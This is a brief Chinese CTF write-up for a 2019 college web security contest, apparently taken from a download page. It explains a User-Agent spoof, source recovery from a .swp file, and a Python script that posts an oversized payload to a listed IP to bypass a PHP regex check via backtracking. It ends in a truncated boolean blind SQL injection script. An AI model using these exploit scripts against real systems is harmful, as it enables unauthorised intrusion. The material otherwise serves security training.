推土机CTF-2nd
2019金陵科技学院第二届网络安全竞赛网站题解
web1果粉:
修改ua,包含iphone串口即可。
web2的React:
通过.index.php.swp还原出代码。
利用正则回溯机制导致的安全问题:
import requests
from io import BytesIO
data = {
'greeting': BytesIO(b'Baby PHP' + b'a' * 1000000)
}
res = requests.post('http://120.27.3.220:10001/',data=data)
print(res.text)
web3 babyshop:
简单的bool形盲注,没有任何过滤...
import requests
import string
perm = string.ascii_uppercase + string.d
2023-03-02 18:27:22
26KB
系统开源
1